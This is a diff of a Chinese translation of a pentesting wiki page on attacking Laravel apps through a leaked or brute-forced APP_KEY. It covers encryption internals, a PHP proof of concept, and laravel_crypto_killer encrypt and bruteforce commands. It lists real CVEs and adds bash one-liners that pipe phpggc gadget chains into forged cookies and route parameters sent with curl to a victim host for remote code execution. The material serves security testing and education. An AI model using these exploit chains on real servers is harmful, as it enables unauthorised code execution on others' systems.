Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

src/network-services-pentesting/pentesting-web/laravel.md

@@ -11,7 +11,7 @@
 ## APP_KEY & 加密内部机制 (Laravel \u003e=5.6)
 
 Laravel 在底层使用 AES-256-CBC (或 GCM) 和 HMAC 完整性 (`Illuminate\\Encryption\\Encrypter`)。
-最终**发送到客户端**的原始密文是**一个 JSON 对象的 Base64**，例如:
+最终**发送给客户端**的原始密文是**一个 JSON 对象的 Base64**，例如:
 ```json
 {
 "iv"   : "Base64(random 16-byte IV)",
@@ -20,9 +20,9 @@ Laravel 在底层使用 AES-256-CBC (或 GCM) 和 HMAC 完整性 (`Illuminate\\E
 "tag"  : ""                 // only used for AEAD ciphers (GCM)
 }
 ```
-`encrypt($value, $serialize=true)` 默认会对明文进行 `serialize()`，而 `decrypt($payload, $unserialize=true)` **会自动 `unserialize()`** 解密后的值。因此 **任何知道 32 字节秘密 `APP_KEY` 的攻击者都可以构造一个加密的 PHP 序列化对象，并通过魔术方法（`__wakeup`，`__destruct`，…）获得 RCE**。
+`encrypt($value, $serialize=true)` 默认会对明文进行 `serialize()`，而 `decrypt($payload, $unserialize=true)` **会自动 `unserialize()`** 解密后的值。因此 **任何知道 32 字节秘密 `APP_KEY` 的攻击者都可以构造一个加密的 PHP 序列化对象，并通过魔术方法 (`__wakeup`, `__destruct`, …) 获得 RCE**。
 
-最小 PoC（框架 ≥9.x）：
+最小 PoC (框架 ≥9.x):
 ```php
 use Illuminate\Support\Facades\Crypt;
 
@@ -54,36 +54,46 @@ laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
 | 项目 | 漏洞接收点 | Gadget 链 |
 |---------|-----------------|--------------|
 | Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
-| Snipe-IT ≤v6 (CVE-2024-48987) | 启用 `Passport::withCookieSerialization()` 时的 `XSRF-TOKEN` cookie | Laravel/RCE9 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie 当 `Passport::withCookieSerialization()` 被启用时 | Laravel/RCE9 |
 | Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
 
 利用工作流程始终是：
-1. 获取 `APP_KEY`（默认示例、Git 泄漏、config/.env 泄漏或暴力破解）
-2. 使用 **PHPGGC** 生成 gadget
-3. `laravel_crypto_killer.py encrypt …`
-4. 通过漏洞参数/cookie 传递有效负载 → **RCE**
+1. 获取或暴力破解 32 字节的 `APP_KEY`。
+2. 使用 **PHPGGC** 构建一个 gadget 链（例如 `Laravel/RCE13`、`Laravel/RCE9` 或 `Laravel/RCE15`）。
+3. 使用 **laravel_crypto_killer.py** 和恢复的 `APP_KEY` 加密序列化的 gadget。
+4. 将密文传递给易受攻击的 `decrypt()` 接收点（路由参数、cookie、会话等）以触发 **RCE**。
 
+以下是简洁的一行代码，演示上述每个真实世界 CVE 的完整攻击路径：
+```bash
+# Invoice Ninja ≤5 – /route/{hash}
+php8.2 phpggc Laravel/RCE13 system id -b -f | \
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
+xargs -I% curl "https://victim/route/%"
+
+# Snipe-IT ≤6 – XSRF-TOKEN cookie
+php7.4 phpggc Laravel/RCE9 system id -b | \
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
+curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
+
+# Crater – cookie-based session
+php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
+curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
+```
 ---
 
-## 通过 cookie 暴力破解进行大规模 APP_KEY 发现
+## 通过 cookie 暴力破解发现大量 APP_KEY
 
-因为每个新的 Laravel 响应至少设置 1 个加密 cookie（`XSRF-TOKEN` 和通常的 `laravel_session`），**公共互联网扫描器（Shodan, Censys, …）泄漏数百万个密文**，可以离线攻击。
+因为每个新的 Laravel 响应至少设置 1 个加密 cookie（`XSRF-TOKEN` 和通常的 `laravel_session`），**公共互联网扫描器（Shodan, Censys, …）泄露了数百万个密文**，可以离线攻击。
 
-Synacktiv 发布的研究的主要发现（2024-2025）：
-* 数据集 2024 年 7 月 » 580 k tokens，**3.99 % 密钥被破解**（≈23 k）
-* 数据集 2025 年 5 月 » 625 k tokens，**3.56 % 密钥被破解**
-* >1 000 服务器仍然易受遗留 CVE-2018-15133 的影响，因为令牌直接包含序列化数据。
+Synacktiv 发布的研究关键发现（2024-2025）：
+* 数据集 2024 年 7 月 » 580 k tokens，**3.99 % 的密钥被破解**（≈23 k）
+* 数据集 2025 年 5 月 » 625 k tokens，**3.56 % 的密钥被破解**
+* >1 000 服务器仍然易受旧版 CVE-2018-15133 的影响，因为令牌直接包含序列化数据。
 * 巨大的密钥重用 – 前 10 个 APP_KEY 是与商业 Laravel 模板（UltimatePOS, Invoice Ninja, XPanel, …）一起提供的硬编码默认值。
 
 私有 Go 工具 **nounours** 将 AES-CBC/GCM 暴力破解吞吐量提升至 ~1.5 亿次尝试/秒，将完整数据集破解时间缩短至 <2 分钟。
 
----
-
-## 参考文献
-* [Laravel: APP_KEY 泄漏分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
-* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
-* [PHPGGC – PHP 通用 Gadget 链](https://github.com/ambionics/phpggc)
-* [CVE-2018-15133 详细说明 (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
 
 ## Laravel 技巧
 
@@ -98,7 +108,7 @@ Synacktiv 发布的研究的主要发现（2024-2025）：
 
 ### .env
 
-Laravel 将用于加密 cookie 和其他凭据的 APP 保存到一个名为 `.env` 的文件中，可以通过某些路径遍历访问：`/../.env`
+Laravel 将用于加密 cookie 和其他凭据的 APP 保存在一个名为 `.env` 的文件中，可以通过某些路径遍历访问：`/../.env`
 
 Laravel 还会在调试页面中显示此信息（当 Laravel 发现错误并激活时会出现）。
 
@@ -176,89 +186,9 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
 
 另一个反序列化：[https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
 
-### Laravel SQLInjection
-
-在这里阅读有关此内容的信息：[https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-
-### Laravel SQLInjection
-
-在这里阅读有关此内容的信息：[https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-
----
-
-## APP_KEY & 加密内部机制 (Laravel \u003e=5.6)
-
-Laravel 在底层使用 AES-256-CBC（或 GCM）和 HMAC 完整性 (`Illuminate\\Encryption\\Encrypter`)。
-最终**发送到客户端**的原始密文是**一个 JSON 对象的 Base64**，例如：
-```json
-{
-"iv"   : "Base64(random 16-byte IV)",
-"value": "Base64(ciphertext)",
-"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
-"tag"  : ""                 // only used for AEAD ciphers (GCM)
-}
-```
-`encrypt($value, $serialize=true)` 默认会对明文进行 `serialize()`，而 `decrypt($payload, $unserialize=true)` **会自动 `unserialize()`** 解密后的值。因此 **任何知道 32 字节秘密 `APP_KEY` 的攻击者都可以构造一个加密的 PHP 序列化对象，并通过魔术方法 (`__wakeup`, `__destruct`, …) 获得 RCE**。
-
-最小 PoC (框架 ≥9.x)：
-```php
-use Illuminate\Support\Facades\Crypt;
-
-$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
-$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
-```
-将生成的字符串注入任何易受攻击的 `decrypt()` 接收点（路由参数、cookie、会话等）。
-
----
-
-## laravel-crypto-killer 🧨
-[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) 自动化整个过程并添加了一个方便的 **bruteforce** 模式：
-```bash
-# Encrypt a phpggc chain with a known APP_KEY
-laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
-
-# Decrypt a captured cookie / token
-laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
-
-# Try a word-list of keys against a token (offline)
-laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
-```
-脚本透明地支持 CBC 和 GCM 有效负载，并重新生成 HMAC/tag 字段。
-
----
-
-## 真实世界的漏洞模式
-
-| 项目 | 漏洞接收点 | Gadget 链 |
-|---------|-----------------|--------------|
-| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
-| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie 当 `Passport::withCookieSerialization()` 被启用时 | Laravel/RCE9 |
-| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
-
-利用工作流程始终是：
-1. 获取 `APP_KEY`（默认示例、Git 泄漏、config/.env 泄漏或暴力破解）
-2. 使用 **PHPGGC** 生成 gadget
-3. `laravel_crypto_killer.py encrypt …`
-4. 通过漏洞参数/cookie 传递有效负载 → **RCE**
-
----
-
-## 通过 cookie 暴力破解大规模发现 APP_KEY
-
-因为每个新的 Laravel 响应至少设置 1 个加密 cookie（`XSRF-TOKEN` 和通常的 `laravel_session`），**公共互联网扫描器（Shodan, Censys, …）泄漏数百万个密文**，可以离线攻击。
-
-Synacktiv 发布的研究的主要发现（2024-2025）：
-* 数据集 2024 年 7 月 » 580 k tokens, **3.99 % 密钥被破解** (≈23 k)
-* 数据集 2025 年 5 月 » 625 k tokens, **3.56 % 密钥被破解**
-* >1 000 服务器仍然易受遗留 CVE-2018-15133 的影响，因为令牌直接包含序列化数据。
-* 巨大的密钥重用 – 前 10 个 APP_KEY 是与商业 Laravel 模板（UltimatePOS, Invoice Ninja, XPanel, …）一起提供的硬编码默认值。
-
-私有 Go 工具 **nounours** 将 AES-CBC/GCM 暴力破解吞吐量提升至 ~1.5 亿次尝试/秒，将完整数据集破解时间缩短至 <2 分钟。
-
----
-
-## 参考文献
-* [Laravel: APP_KEY 泄漏分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+## 参考
+* [Laravel: APP_KEY 泄露分析 (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [Laravel : APP_KEY 泄露分析 (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
 * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
 * [PHPGGC – PHP 通用 Gadget 链](https://github.com/ambionics/phpggc)
 * [CVE-2018-15133 详细分析 (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)